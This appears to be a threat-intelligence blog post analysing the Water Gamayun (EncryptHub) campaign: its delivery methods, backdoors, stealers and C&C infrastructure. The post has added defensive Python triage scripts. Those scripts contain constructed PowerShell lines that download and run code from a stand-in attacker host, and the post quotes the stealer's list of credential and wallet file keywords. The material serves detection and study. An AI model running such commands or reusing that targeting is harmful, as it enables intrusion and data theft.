A Deep Dive into Water Gamayun's Arsenal and Infrastructure
Published: 2025-03-28 · Archived: 2026-04-02 11:58:10 UTC

Summary

Water Gamayun exploits the MSC EvilTwin zero-day vulnerability (CVE-2025-26633) to compromise systems and exfiltrate data, using custom payloads and data exfiltration techniques. Businesses can be severely impacted by such an attack through data theft and operational disruption.

The threat actor deploys payloads primarily by means of malicious provisioning packages, signed .msi files, and Windows MSC files, and uses techniques such as abusing the IntelliJ launcher runnerw.exe to proxy command execution. EncryptHub Stealer variants and backdoors such as SilentPrism and DarkWisp are used to gain persistence and steal data. These malware strains communicate with C&C servers for command execution and data exfiltration, using encrypted channels and anti-analysis techniques.

Organizations can protect themselves from threats like Water Gamayun through up-to-date patch management and advanced threat detection technologies. Trend customers are protected from attempts to exploit CVE-2025-26633 via Trend Vision One™ rules and filters.

Water Gamayun, a suspected Russian threat actor also known as EncryptHub and Larva-208, has been exploiting MSC EvilTwin (CVE-2025-26633), a zero-day vulnerability that was patched on March 11. In the first installment of this two-part series, Trend Research discussed in depth its discovery of a Water Gamayun campaign exploiting this vulnerability. In this blog entry, we cover the various delivery methods, custom payloads and techniques used by Water Gamayun to compromise victim systems and exfiltrate sensitive data. The threat actor mainly delivers malicious payloads through provisioning packages (.ppkg), signed Microsoft Installer files (.msi) and Windows MSC files.
We also identified a new living-off-the-land binary (LOLBin) technique in which the attacker uses the IntelliJ process launcher runnerw.exe to proxy the execution of PowerShell commands on an infected system. This campaign, attributed to Water Gamayun, appears to be under active development. Its payloads are designed to maintain persistence, steal sensitive data and exfiltrate it to the attackers' command-and-control (C&C) servers. In this research, we provide a detailed analysis of each malicious payload in this arsenal. Notably, we gained access to the components and modules of the C&C servers, enabling a comprehensive analysis of their architecture, functionality, and evasion techniques.

The identified arsenal associated with Water Gamayun is listed below; all of these modules are covered in this blog post.

EncryptHub stealer
DarkWisp backdoor
SilentPrism backdoor
MSC EvilTwin loader
Stealc
Rhadamanthys stealer

In the following section, we explore the history of EncryptHub and analyze the associated malware.

EncryptHub's origins

On July 26, 2024, security researcher Germán Fernández tweeted about a fake WinRAR website distributing various types of malware, including stealers, miners, hidden virtual network computing (hVNC) tools, and ransomware, as shown in Figure 1. These malicious tools were hosted on a GitHub repository named "encrypthub," managed by a user called "sap3r-encrypthub" (Figure 2).

Figure 2. EncryptHub GitHub repository

Subsequently, on August 5, 2024, researchers published an analysis detailing this attack vector, shedding light on the malicious activity associated with this campaign. The GitHub repository was later taken down, and its contents were relocated to the encrypthub.(net/org) domain.
The attackers transitioned their operations to this domain, using it both to host the malware and to manage their C&C server infrastructure. At the time of our research, the encrypthub.(net/org) domain was no longer operational. During our investigation, we identified a new and active server at 82[.]115[.]223[.]182. Usually, a server stays active for a few days before going down, and a new one is then deployed to replace it. We list these C&C servers in the Indicators of Compromise (IOC) section at the end of this blog entry.

MSI malware distribution vector

Table 1. MSI malware (file type: MSI)
DingTalk_v7.6.38.122510801.msi
  MD5: abaa46bc704842d6cc6f494c21546ae6
  SHA-1: 87c46845f57dc9ca8136b730c08b5b5916ca0ad3
  SHA-256: cbb84155467087c4da2ec411463e4af379582bb742ce7009156756482868859c
  Size: 4.01 MB (4205056 bytes)
QQTalk.msi
  MD5: 87792cf4bd370f483a293a23c4247c50
  SHA-1: a225bee48074feac53c7cb2f3929a41f7b4a71d3
  SHA-256: 725df91a9db2e077203d78b8bef95b8cf093e7d0ee2e7a4f55a30fe200c3bf8f
  Size: 4.06 MB (4259328 bytes)
VooV Meeting.msi
  MD5: e59a025f9310d266190b91f5330fde8d
  SHA-1: ffb72adff6e099a9deb418c5d40abd8cf9b12c42
  SHA-256: db3fe436f4eeb9c20dc206af3dfdff8454460ad80ef4bab03291528e3e0754ad
  Size: 4.09 MB (4291584 bytes)

The MSI (Microsoft Installer) file is designed to execute a PowerShell downloader, which downloads and runs the next-stage payload on an infected system. The threat actor takes advantage of the Custom Action feature of the MSI package format to run the PowerShell script. The CustomAction table includes third-party libraries such as aicustact.dll and PowerShellScriptLauncher.dll, indicating that the MSI was likely created with the "Advanced Installer" application. The malicious script is embedded in the AI_DATA_SETTER custom action within the CustomActionData field (Figure 3).

Figure 3. Malicious MSI custom action

AI_DATA_SETTER is a Type 51 custom action, the type used to set a property value dynamically during installation. The embedded script is executed by the PowerShellScriptInline custom action, exported from the PowerShellScriptLauncher.dll library: this action retrieves the PowerShell code from the CustomActionData property at runtime and executes it. For triage, this means the script text lives in the Target column of a property-setting row rather than in a script action or an embedded binary, so a review of the package has to follow the property from the setter to the deferred action that consumes it.

Figure 4. MSI execution flow

SilentPrism backdoor

Table 2. SilentPrism (file type: PowerShell)
worker.ps1
  MD5: f0df469c3459a6a3b98b7b69b07bf61b
  SHA-1: b38a0478aefa9d9d77282dd82ada51d7a47fe6f5
  SHA-256: 983506186590f7118cb507d29f12f163afb536a03e6d0f4fb441df8afe49ede1
  Size: 13241 bytes

SilentPrism is a backdoor designed to achieve persistence, dynamically execute shell commands, and maintain unauthorized remote control of compromised systems (Figure 5). It implements persistence differently depending on user privileges: for non-administrative users, it creates auto-run entries in the Windows registry that use mshta.exe combined with VBScript to download and execute remote payloads; for administrative users, it deploys scheduled tasks with a similar execution method. SilentPrism retrieves additional payloads and instructions from a C&C server, which keeps it modular. The malware communicates with its C&C server over encrypted channels, using AES encryption and Base64 encoding to obfuscate data. Commands received are decrypted and executed in various ways, including direct PowerShell script execution, dynamic script block creation, or job-based execution. Each task is tracked by a unique identifier, allowing the malware to monitor execution states and return results to the server.
SilentPrism incorporates anti-analysis techniques such as virtual machine detection and randomized sleep intervals (300 to 700 milliseconds) between operations, making its behavior less predictable. It also continuously polls the C&C server for commands, enabling operators to control infected systems dynamically.

Figure 5. SilentPrism execution logic

Figure 6 shows the network traffic generated by an infected system during its registration and data exfiltration process, and Figure 7 shows the decrypted data sent by the malware.

Figure 6. Exfiltration of encrypted collected information
Figure 7. Sample of the decrypted collected information

The script enters a polling cycle with randomized sleep intervals (300 to 700 milliseconds) in which it transmits the system's Universally Unique Identifier (UUID) to a predefined endpoint. When the response is anything other than a wait instruction, the script deserializes the JSON payload containing command instructions, tracks execution status through its job management logic, and uses PowerShell's scriptblock creation mechanism together with Invoke-Expression (iex) to execute arbitrary commands received from the C&C server.

The script uses PowerShell's Start-Job functionality to run commands asynchronously, which lets the malware execute multiple commands simultaneously without blocking the main communication loop. Completed job outputs are encrypted and transmitted back to the server. The code snippet in Figure 8 shows the SilentPrism backdoor's beaconing and command execution logic.

Figure 8. SilentPrism command execution logic

MSC EvilTwin loader

Table 3. MSC EvilTwin loader (file type: PowerShell)
miner.ps1
  MD5: 239e8a3ee1fafe452d0b59eadb32247b
  SHA-1: 1377a69ae519d1cf000fa51869454e31ba92056d
  SHA-256: 0ac748baaad6017e331a8d99aae9e5449a96ba76fb7374f5d8c678ae52b7db9f
  Size: 276 KB (282803 bytes)
runner.ps1
  MD5: 99a80820ae6dc60c9e9307e6ed8ef211
  SHA-1: 2e4ae2af76c6239eb4191853221b4a40139cc122
  SHA-256: f381a3877028f29ec7865b505b5c85ce77d4947d387d3f30071159fa991f009a
  Size: 276 KB (282808 bytes)

The MSC EvilTwin loader (Figure 9) represents a novel approach to malware deployment (CVE-2025-26633) using specially crafted Microsoft Saved Console (.msc) files. The loader creates two directories, C:\Windows \System32\ and C:\Windows \System32\en-US (note the trailing space after "Windows"). These directories differ from the legitimate system paths only by that space, which lends credibility to the files placed within them. The loader contains two Base64-encoded payloads, referred to as decodedBytesOriginal and decodedBytesFakes. decodedBytesOriginal holds a decoy XML configuration .msc file, while decodedBytesFakes holds a crafted .msc file with a placeholder {htmlLoaderUrl}. This placeholder is later replaced with the URL https://82[.]115[.]223[.]182/encrypthub/ram/, which serves PowerShell commands. The loader writes the decoy .msc file to C:\Windows \System32\WmiMgmt.msc and the malicious .msc file to C:\Windows \System32\en-US\WmiMgmt.msc, replacing the {htmlLoaderUrl} placeholder in the malicious file with the specified URL (Figure 10). The loader then executes the malicious .msc file using Start-Process. This execution downloads and runs a PowerShell script from the specified URL to deliver the next-stage payload. Afterward, the loader sleeps for 30 seconds (Start-Sleep), likely to let the payload complete and to avoid detection.
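Returning to the MSI delivery vector described earlier (Table 1, Figures 3 and 4): the Python triage helper below is an added example, not code from the page or from the attacker's packages. It decodes the CustomAction Type column the way Windows Installer does and ties a Type 51 property-setting row to the deferred action that reads that property as CustomActionData, which is how the AI_DATA_SETTER script reaches PowerShellScriptInline. The rows are constructed in the shape Orca or msitools export; apart from AI_DATA_SETTER, PowerShellScriptInline, PowerShellScriptLauncher.dll and aicustact.dll, which the page names, every action name, type value, entry point and script string is an assumption. It goes beyond the single case on the page by decoding the full flag layout (deferred, no-impersonate, hide-target) for any row.

```python
"""Decoding and triaging Windows Installer CustomAction rows.

Added example, not code from the page or from the threat actor. The rows below
are constructed to look like what Orca or msitools export from an Advanced
Installer package's CustomAction table; the real rows of the Table 1 samples
are not reproduced in the write-up, and every name except AI_DATA_SETTER,
PowerShellScriptInline, PowerShellScriptLauncher.dll and aicustact.dll is an
assumption. The Type bit layout follows Microsoft's msidbCustomActionType*
constants.
"""
from __future__ import annotations

import base64
import re

_BASE = {0x1: "DLL", 0x2: "EXE", 0x3: "TextData", 0x5: "JScript", 0x6: "VBScript"}
_SOURCE = {0x00: "Binary", 0x10: "File", 0x20: "Directory", 0x30: "Property"}
_MEANING = {  # (base, source) -> what Windows Installer does with the row
    ("TextData", "Property"): "set property to formatted text (Type 51)",
    ("TextData", "Directory"): "set directory (Type 35)",
    ("EXE", "Property"): "run EXE whose path is in a property (Type 50)",
    ("DLL", "Binary"): "call DLL stored in the Binary table (Type 1)",
    ("EXE", "Binary"): "run EXE stored in the Binary table (Type 2)",
    ("JScript", "Property"): "run JScript held in a property (Type 53)",
    ("VBScript", "Property"): "run VBScript held in a property (Type 54)",
}
SCRIPT_HINTS = re.compile(
    r"powershell|invoke-expression|\biex\b|frombase64string|downloadstring"
    r"|-e(?:nc|ncodedcommand)?\s|net\.webclient", re.I)


def decode_type(ca_type: int) -> dict:
    """Split CustomAction.Type into base type, source and scheduling/option flags."""
    base = _BASE.get(ca_type & 0x0F, f"unknown({ca_type & 0x0F})")
    source = _SOURCE[ca_type & 0x30]
    flags = []
    if ca_type & 0x40:
        flags.append("Continue")          # return code ignored
    if ca_type & 0x80:
        flags.append("Async")
    if ca_type & 0x400:                   # deferred: runs from the install script
        flags.append("InScript")
        if ca_type & 0x100:
            flags.append("Rollback")
        if ca_type & 0x200:
            flags.append("Commit")
        if ca_type & 0x800:               # deferred action runs as LocalSystem
            flags.append("NoImpersonate")
    elif ca_type & 0x300 == 0x300:
        flags.append("ClientRepeat")
    elif ca_type & 0x100:
        flags.append("FirstSequence")
    elif ca_type & 0x200:
        flags.append("OncePerProcess")
    if ca_type & 0x2000:
        flags.append("HideTarget")        # Target column kept out of the MSI log
    return {"base": base, "source": source, "flags": flags,
            "meaning": _MEANING.get((base, source), f"{base} from {source}")}


def decode_encoded_command(text: str) -> str | None:
    """Recover the script behind 'powershell -EncodedCommand <Base64 of UTF-16LE>'."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", text, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(rows: list[dict]) -> list[dict]:
    """Flag Type 51 setters that carry script text and tie each to the deferred
    action that will read it: a deferred action sees, as CustomActionData, the
    property that shares its name."""
    decoded = {r["Action"]: decode_type(r["Type"]) for r in rows}
    deferred = {name for name, d in decoded.items() if "InScript" in d["flags"]}
    findings = []
    for row in rows:
        info = decoded[row["Action"]]
        target = row.get("Target") or ""
        if (info["base"], info["source"]) != ("TextData", "Property"):
            continue
        if not SCRIPT_HINTS.search(target):
            continue
        consumer = row["Source"] if row["Source"] in deferred else None
        findings.append({
            "setter": row["Action"],
            "feeds": consumer,
            "runs_as_system": consumer is not None and "NoImpersonate" in decoded[consumer]["flags"],
            "script": decode_encoded_command(target) or target,
        })
    return findings


# Constructed CustomAction rows (not the real table of the samples).
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/stage2.ps1')"
SAMPLE_ROWS = [
    {"Action": "AI_DATA_SETTER", "Type": 51, "Source": "PowerShellScriptInline",
     "Target": "powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand "
               + base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode()},
    {"Action": "PowerShellScriptInline", "Type": 3073,   # 1 | 0x400 | 0x800: deferred, no-impersonate
     "Source": "PowerShellScriptLauncher.dll", "Target": "PowerShellScriptInline"},
    {"Action": "AI_DetectSoftware", "Type": 1, "Source": "aicustact.dll", "Target": "DetectSoftware"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f['setter']} -> {f['feeds']} (runs as SYSTEM: {f['runs_as_system']}): {f['script']}")
```

The point of following the property rather than grepping the Binary table is that a deferred action scheduled with NoImpersonate runs as LocalSystem, so a script smuggled in through CustomActionData executes with higher privilege than the user who double-clicked the installer.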
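To turn the loader behaviour above into a check, here is an added example (Python, not code from the page or from the loader) that normalizes Windows paths the way the Win32 path parser does, so that C:\Windows \System32\en-US\WmiMgmt.msc is recognised as a lookalike of the genuine System32 path, and that scans .msc bodies for the ExecuteShellCommand call and the remote URL it fetches. The file events and console bodies are constructed; the URL is a placeholder, and the XML snippets are not the sample's real content, only what the page states about it.

```python
"""Spotting the MSC EvilTwin directory trick in file telemetry.

Added example, not code from the page or from the loader. The file events are
constructed; the .msc bodies are constructed snippets that assume only what the
page states (a crafted console whose view object calls ExecuteShellCommand on a
URL-hosted payload), not the exact XML of the real WmiMgmt.msc twin. The C2 URL
is a placeholder.
"""
from __future__ import annotations

import re

REAL_SYSTEM32 = r"c:\windows\system32"

MSC_MARKERS = {
    "execute_shell_command": re.compile(r"ExecuteShellCommand", re.I),
    "remote_url": re.compile(r"https?://[^\s\"'<>)]+", re.I),
    "powershell": re.compile(r"powershell|\biex\b|invoke-expression", re.I),
}


def _components(path: str) -> list[str]:
    return [p for p in re.split(r"[\\/]+", path.strip()) if p]


def normalize_win_path(path: str) -> str:
    """Lower-case, unify separators and drop the trailing spaces and dots that the
    Win32 path parser strips from each component, so that
    'C:\\Windows \\System32\\en-US\\WmiMgmt.msc' compares equal to the genuine
    System32 path even though it is a different directory on disk."""
    return "\\".join(p.rstrip(" .") for p in _components(path)).lower()


def path_findings(path: str) -> list[str]:
    """Reasons a path is suspicious on its own, before looking at content."""
    raw = "\\".join(_components(path)).lower()
    norm = normalize_win_path(path)
    reasons = []
    if raw != norm:
        reasons.append("component-ends-with-space-or-dot")  # not creatable through ordinary Win32 calls
        if norm == REAL_SYSTEM32 or norm.startswith(REAL_SYSTEM32 + "\\"):
            reasons.append("lookalike-of-system32")
    return reasons


def scan_msc(body: str) -> dict[str, list[str]]:
    """Marker hits inside a saved-console file; a legitimate .msc has none of them."""
    return {name: rx.findall(body) for name, rx in MSC_MARKERS.items() if rx.search(body)}


def triage_file_events(events: list[dict]) -> list[dict]:
    """Combine path and content checks over file-creation events."""
    alerts = []
    for ev in events:
        reasons = path_findings(ev["path"])
        hits = scan_msc(ev.get("content", "")) if ev["path"].lower().endswith(".msc") else {}
        if "execute_shell_command" in hits:
            reasons.append("msc-calls-ExecuteShellCommand")
        if reasons:
            alerts.append({"path": ev["path"], "reasons": reasons, "urls": hits.get("remote_url", [])})
    return alerts


# Constructed events mirroring the loader's behaviour: a decoy console in the
# lookalike System32, the armed twin in its en-US subfolder, plus benign noise.
DECOY_MSC = '<MMC_ConsoleFile ConsoleVersion="3.0"><!-- constructed decoy, no script --></MMC_ConsoleFile>'
ARMED_MSC = ('<MMC_ConsoleFile ConsoleVersion="3.0"><!-- constructed twin -->'
             'external.ExecuteShellCommand("powershell", "", '
             '"-w hidden -c iex((New-Object Net.WebClient).DownloadString(\'https://c2.example.invalid/encrypthub/ram/\'))", "7")'
             '</MMC_ConsoleFile>')
SAMPLE_EVENTS = [
    {"path": r"C:\Windows \System32\WmiMgmt.msc", "content": DECOY_MSC},
    {"path": r"C:\Windows \System32\en-US\WmiMgmt.msc", "content": ARMED_MSC},
    {"path": r"C:\Windows\System32\WmiMgmt.msc", "content": DECOY_MSC},   # the real console
    {"path": r"C:\Users\alice\Documents\notes.txt", "content": "todo"},
]

if __name__ == "__main__":
    for a in triage_file_events(SAMPLE_EVENTS):
        print(a["path"], a["reasons"], a["urls"])
```

The path check fires on the decoy as well as on the armed twin, which is intended: the lookalike directory itself is the artifact worth alerting on, since the loader deletes it 30 seconds later and only a file-creation event stream will still have it.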
Finally, the loader cleans up by removing the directories and files it created (C:\Windows \System32\en-US, C:\Windows \System32\ and the "C:\Windows " root with the trailing space) to minimize forensic traces.

Figure 9. MSC EvilTwin loader main logic
Figure 10. Executing code hosted on the C&C server via the MMC.exe view object method ExecuteShellCommand

In runner.ps1 (Table 3), the malware downloads and deploys the Rhadamanthys stealer onto the infected system. The file ram.exe (SHA-256: bad43a1c8ba1dacf3daf82bc30a0673f9bc2675ea6cdedd34624ffc933b959f4) serves as the Rhadamanthys loader, responsible for installing and activating the Rhadamanthys stealer on the compromised machine.

DarkWisp backdoor analysis

Table 4. DarkWisp backdoor (file type: PowerShell)
Encrypt.ps1
  MD5: 42b55615cbaa014f246097bd904d7ff2
  SHA-1: f16e0dac597de903a4c6842184770ba5618275a0
  SHA-256: d150d8d8bfa651c0e08a10323ecb0bccf346a35bd1bad19f89a5338acd8a88b3
  Size: 24.90 KB (25495 bytes)

To achieve persistence on infected systems, Water Gamayun employs two distinct backdoors. In earlier campaigns using encrypthub[.]net/org, they utilized the SilentPrism backdoor, a tool designed for stealthy access and control. In their latest campaign, we identified a new backdoor, which we have named DarkWisp.

DarkWisp is a PowerShell-based backdoor and reconnaissance utility designed for unauthorized system access and intelligence gathering (Table 4). It enables attackers to exfiltrate sensitive data while maintaining persistent control over the compromised system. Figure 11 provides an overview of the core logic behind DarkWisp, showing its structure and functionality.

Figure 11. DarkWisp execution flow

The malware collects extensive information about the compromised system to build a detailed profile (Figure 12). It determines whether the user has administrative privileges, checks for membership in a corporate domain, and identifies the presence of cryptocurrency wallets or VPN software by scanning specific directories and applications. It also gathers data about the system's operating environment, including public IP address, geographic location, installed antivirus products, firewall status, and system uptime. This information is compiled into a structured format and transmitted to the C&C server.

Figure 12. DarkWisp data exfiltration

The malware implements a dual-channel C&C communication strategy. The primary channel is a raw TCP connection to port 8080, used for three purposes:
1. Sending the initial system reconnaissance data (computer name, user privileges, OS details, cryptocurrency wallet presence, VPN status, and antivirus information)
2. Maintaining a persistent connection through a PING mechanism
3. Receiving Base64-encoded commands from the C&C server

The secondary channel is HTTPS on port 8081 and serves as a redundant path specifically for exfiltrating command execution results. When a command is executed, the output is sent both through the TCP connection on port 8080, encoded as a Base64 string, and through an HTTPS GET request to port 8081 using the endpoint /receive_result. This dual-channel approach ensures delivery of command outputs back to the C&C server even if one channel becomes unavailable. Figure 13 shows the network traffic sent by the malware over TCP on port 8080.

Figure 13. DarkWisp backdoor network communication

Once the malware has exfiltrated the reconnaissance and system information to the C&C server, it enters a continuous loop waiting for commands. Commands arrive over the TCP connection on port 8080 in the format COMMAND|<Base64-encoded command>.

Figure 14. DarkWisp command execution

Each DarkWisp backdoor stub carries a unique build identifier, which the C&C server reads once a connection is established; the server then sends commands specific to that build. In this case the build identifier is encrypthub (Figure 15), and the server issues a predefined command, whoami, encoded as COMMAND|d2hvYW1p. Figure 16 shows this configuration as stored on the C&C server.

Figure 15. Payload build
Figure 16. C&C server configuration

The malware decodes the Base64-encoded command and executes it with the Invoke-Expression cmdlet. The output is formatted as RESULT|<Base64-encoded output> and sent back to the server over TCP on port 8080, and optionally over HTTPS on port 8081, for redundancy and evasion (Figure 17). The main communication loop keeps the interaction with the server going: handling commands, maintaining connectivity, and transmitting results.

Figure 17. Command execution result exfiltration
Figure 18. Execution debug message: the server issues a "whoami" command to the malware upon establishing a connection

EncryptHub stealers

We have identified five information stealers in the Water Gamayun arsenal: three custom PowerShell payloads and two known malware binaries, Stealc and Rhadamanthys Stealer.
In the campaign distributing malware via encrypthub[.]org/net, the custom PowerShell-based stealers were named stealer_module.ps1 and encrypthub_steal.ps1; we refer to them as EncryptHub Stealer variant A. Among the payloads served from 82[.]115[.]223[.]182/payload, the information stealer was named fickle_payload.ps1; we refer to it as EncryptHub Stealer variant B. In a more recent campaign, we identified another variant named payload.ps1, which we refer to as EncryptHub Stealer variant C. These variants exhibit similar functionality, with only minor modifications distinguishing them.

All EncryptHub variants covered in this research are modified versions of the open-source Kematian-Stealer. These variants also use the banner shown in Figure 19, unlike the original Kematian-Stealer developed by "Somali-Devs", which is no longer available on GitHub.

Figure 19. EncryptHub stealer's banner

EncryptHub Stealer is distributed through malicious MSI packages or binary malware droppers such as skotes.exe (SHA-256: 079b7f03c727de92c3fcb7d3b9b9fea6d1e9ffdcd60dc9a360af90ce7b4b5cc6), WEXTRACT.EXE.MUI (SHA-256: 5752efa219c7e42cb104917f38c146e1f747d14230be0e64a5e87c20e82075bb), and axplong.exe (SHA-256: 2a5f9198f1e563688a2081b746bdaf48d897ec0ae96dfafc15cd5cd52c25e8f2). These droppers also deploy and execute other stealers, including Lumma Stealer and Amadey. EncryptHub's execution flow and architecture are shown in Figure 20.

Figure 20. EncryptHub stealer: execution flow and architecture

EncryptHub Stealer Variant A

Table 5. EncryptHub Stealer Variant A (file type: PowerShell)
stealer_module.ps1
  MD5: 2f8bf3e5b6cbdb0c8e5935b078711867
  SHA-1: ca4fea2deacb9665461eb74b6422b137326c0d76
  SHA-256: b29e630b9c70b0daaba4f83489494444c04c7a470b9c24eb4ddffb6cd7cf05ff
  Size: 368111 bytes
encrypthub_steal.ps1
  MD5: 1fbe357c26133a4b39b96fdd2c48f1ae
  SHA-1: 57ab6bdbb41289f3c8983d5b48fc98c08782ed1f
  SHA-256: 677601f72181c53541f850248dd0904153ea62458489d7aa782149b93399ebd8
  Size: 371740 bytes

Upon execution, the malware collects extensive system information, including antivirus software, installed software, network adapters, running applications, and more. It also extracts sensitive data such as Wi-Fi passwords, Windows product keys, clipboard history, and session data from various messaging clients, VPN clients, VNC clients, FTP clients, and password managers. Additionally, it collects files from user directories whose names match the following keywords and extensions:

$keywords = @("2fa", "acc", "account", "auth", "backup", "bank", "binance", "bitcoin", "bitwarden", "btc", "casino", "code", "coinbase ", "crypto", "dashlane", "discord", "eth", "exodus", "facebook", "funds", "info", "keepass", "keys", "kraken", "kucoin", "lastpass", "ledger", "login", "mail", "memo", "metamask", "mnemonic", "nordpass", "note", "pass", "passphrase", "proton", "paypal", "pgp", [...])
$allowedExtensions = @("*.jpg", "*.png", "*.rdp", "*.txt", "*.doc", "*.docx", "*.pdf", "*.csv", "*.xls", "*.xlsx", "*.ldb", "*.log", "*.pem", "*.ppk", "*.key", "*.pfx")

Figure 21 illustrates how the malware fingerprints a victim machine.

Figure 21. EncryptHub Variant A: system information gathering

The malware then sends the collected system information to the attacker's C&C server (Figure 22); unlike Kematian stealer, which used Discord for exfiltration, it posts directly to the C&C server. Figure 23 shows the HTTP request used to exfiltrate system information.

Figure 22. Collection and exfiltration of system information
Figure 23. HTTP request used to exfiltrate system information

After transmitting the system information, the malware starts the stealing process. It gathers additional data such as browser credentials, clipboard content, and other sensitive information. This data is compressed into a ZIP archive and uploaded to the attacker's C&C server (Figure 24). Figure 25 shows the HTTP request used to exfiltrate the stolen data.

Figure 24. Archiving and exfiltrating collected data
Figure 25. HTTP request used to exfiltrate collected data

In this variant, we identified the use of a LOLBin technique (Figure 26), which attackers use to carry out malicious activity while blending in with normal system operations to evade detection. Here, the malware loads IntelliJ's runnerw.exe, renamed to invoker.exe (SHA-256: 91aa7642a301ad6f46a6e466d89b601270aac64b7b6a5661436f7f9b5d804e89), a Windows executable that acts as a wrapper process for running and managing programs launched from IntelliJ IDEA. The script ensures it runs with administrative privileges and, if successful, decodes and writes a payload to the created C:\Windows\System32 directory.
It then uses invoker.exe to launch powershell.exe with a hidden window and an execution policy bypass, which downloads and executes a remote script. The technique evades detection by abusing the inherent trust in legitimate binaries and system directories, combining script execution with network-based payload delivery. One consequence worth using defensively: renaming does not change the PE version resource, so the proxy process still carries the original file name runnerw.exe, which is a more reliable hunting key than the on-disk name invoker.exe.

Figure 26. LOLBin technique

Figure 27 shows the execution of the PowerShell script through the renamed file invoker.exe.

Figure 27. PowerShell execution via LOLBin technique

EncryptHub Stealer Variant B

Table 6. EncryptHub Stealer Variant B (file type: PowerShell)
fickle_payload.ps1
  MD5: 3371da6397159dbced2794c12aeb80c6
  SHA-1: 291ed2eb864c95ba5495ca415efd1b071362ec7b
  SHA-256: 899d0b75e7eb3250246f709ad8aa32a8634f536153a3d2eaa3b5a9d9c2690168
  Size: 28490240 bytes

This stealer variant was identified in a campaign hosted on the C&C server at 82[.]115[.]223[.]182. Figure 28 shows the debug execution message of EncryptHub Variant B. While there are code similarities between this version and the Kematian stealer, the malware author has made significant modifications, removing some functions and introducing new capabilities: automated collection routines; obfuscation such as Base64-encoding the collected file name and build type (Figure 29); exfiltration of the collected information to a remote server over port 8081 (Figures 30 and 31); and notification messages to the attacker via Telegram (Figures 32 and 33). The data this variant collects is the same as that of the previously mentioned stealers.

Figure 28. EncryptHub Variant B stealer: execution
Figure 29. EncryptHub Variant B collects system information
Figure 30. Constructing the HTTPS request to upload the collected information
Figure 31. Exfiltrating the collected information to the attacker
Figure 32. Constructing the Telegram notification request (associated HTTP request)
Figure 33. Telegram notification

EncryptHub Stealer Variant C

Table 7. EncryptHub Stealer Variant C (file type: PowerShell)
payload.ps1
  MD5: 1c34b88280d660051b69ccb40660e71f
  SHA-1: d63a8c0a00fb1c68450da7cc19a08a6ed96791dc
  SHA-256: 49a552d3adbcad9f5ac70151b48a4edc2ae1d4094a1ea9d944785cee8b4319d7
  Size: 28504756 bytes

Variant C (Table 7) is the latest version of the script, introducing modifications that change how data is exfiltrated to the C&C server (Figure 34). Notably, it removes the Telegram-based channel, replacing it with direct HTTPS exfiltration to a hardcoded attacker-controlled server, hxxps[:]//malwarehunterteam[.]net. (There is no connection between this server and the similarly named group of independent security researchers.) This shift eliminates the reliance on third-party messaging services and gives the attacker full control over the stolen data.

Figure 34. EncryptHub Stealer Variant C: stolen data statistics creation logic

Figure 35 shows how the malware transmits stolen data statistics to its C&C server.
The traffic contains multiple Base64-encoded parameters, which include the victim's system details and the count of stolen items, such as passwords, cookies, cryptocurrency wallets, and messaging credentials. Each parameter is individually encoded and appended to the query string after the /send_notification? endpoint, and the request is sent over port 8081. Base64 is an encoding, not encryption: anyone inspecting the decrypted HTTPS request can read the statistics, and the path /send_notification together with port 8081 is what to match on. This variant's stolen-file exfiltration mechanism and other features are similar to those of Variant B.

Figure 35. EncryptHub Stealer Variant C: stolen data statistics exfiltration

EncryptHub infrastructure

During our research, we identified new and active infrastructure used by EncryptHub, under development at 82[.]115[.]223[.]182. Its login page is shown in Figure 36.

Figure 36. EncryptHub login page

Our investigation revealed that the threat actor uses this server to host a variety of malicious payloads (Figure 37), including encrypted.ps1 and fickle_payload.ps1, data collected from compromised machines, and the server-side implementation of the C&C infrastructure. The file and directory tree structure used in this campaign is shown in Figure 38.

Figure 37. EncryptHub payloads
Figure 38. EncryptHub C&C tree structure

Moreover, we discovered that the threat actor uses HTML pages that appear blank in the browser but contain hidden JavaScript when inspected. This concealed JavaScript downloads additional malicious files, including backdoors such as DarkWisp, stealers like Stealc and Rhadamanthys, and AnyDesk, which is used for remote access. Figure 39 shows the JavaScript code used to execute a PowerShell command, which in turn downloads another PowerShell script responsible for downloading and executing AnyDesk.
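Two of the observables described in the stealer sections lend themselves to a hunt, and the following added example (Python, not code from the page or from the malware) implements both: correlating Sysmon-style process events so that powershell.exe launched by a process whose PE OriginalFileName is runnerw.exe is flagged whatever it was renamed to (Variant A's invoker.exe), and decoding a Variant C statistics beacon sent to /send_notification? on port 8081. The events and the beacon are constructed; the beacon's parameter names are assumptions (the page lists only the kinds of counters carried), as are the exact PowerShell flags on the command line.

```python
"""Two hunts for stealer observables described in the text.

Added example, not code from the page or from the malware. (1) powershell.exe
started by a process whose PE OriginalFileName is runnerw.exe, whatever its
on-disk name (Variant A's invoker.exe); (2) the Variant C statistics beacon, a
GET to /send_notification? on port 8081 whose query values are each
Base64-encoded. The Sysmon-style events and the beacon URL are constructed; the
beacon's parameter names are assumptions.
"""
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import unquote, urlencode, urlsplit

PS_EVASION = ("-w hidden", "-windowstyle hidden", "-ep bypass",
              "-executionpolicy bypass", "-nop", "-noprofile")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def find_proxied_powershell(events: list[dict]) -> list[dict]:
    """Index every event-1 process whose OriginalFileName is runnerw.exe, then
    flag powershell.exe children of those processes. Matching OriginalFileName
    (a PE version-resource field) survives the rename to invoker.exe."""
    launchers = {ev["ProcessGuid"]: ev for ev in events
                 if ev.get("EventID") == 1
                 and ev.get("OriginalFileName", "").lower() == "runnerw.exe"}
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        parent = launchers.get(ev.get("ParentProcessGuid"))
        if parent is None or not ev.get("Image", "").lower().endswith("\\powershell.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        hits.append({
            "rule": "runnerw-proxied-powershell",
            "launcher": parent["Image"],
            "renamed": parent["Image"].lower().rsplit("\\", 1)[-1] != "runnerw.exe",
            "evasion_flags": [f for f in PS_EVASION if f in cmd.lower()],
            "cmd": cmd,
        })
    return hits


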